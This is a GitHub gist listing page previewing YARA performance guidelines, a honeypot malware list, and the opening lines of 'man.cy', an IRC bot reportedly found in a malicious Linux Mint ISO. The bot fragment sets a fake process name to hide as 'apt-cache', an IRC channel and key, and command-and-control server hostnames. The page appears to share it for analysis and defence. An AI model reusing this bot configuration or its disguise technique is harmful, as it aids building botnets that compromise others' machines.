Skip to content

Instantly share code, notes, and snippets.

View zam89's full-sized avatar

Zam zam89

33 followers · 27 following
View GitHub Profile
@zam89
zam89 / yara_performance_guidelines.md
Created November 11, 2016 03:01 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.1, February 2016, applies to all YARA version 3.3+

Global Rules

Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.

@zam89
zam89 / man.cy
Created February 23, 2016 01:51 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
@zam89
zam89 / mwlist.txt
Created June 26, 2014 07:30 — forked from hwdsl2/README.md
# This list summarizes recent malware caught in my Kippo SSH Honeypot (http://code.google.com/p/kippo/)
#
# For detailed instructions, please see:
# https://blog.ls20.com/check-your-server-for-malware-from-ssh-brute-force-attacks/
#
# Last Updated: March 24, 2014
#
# Copyright (C) 2014 Lin Song
#
# This program is free software: you can redistribute it and/or modify it under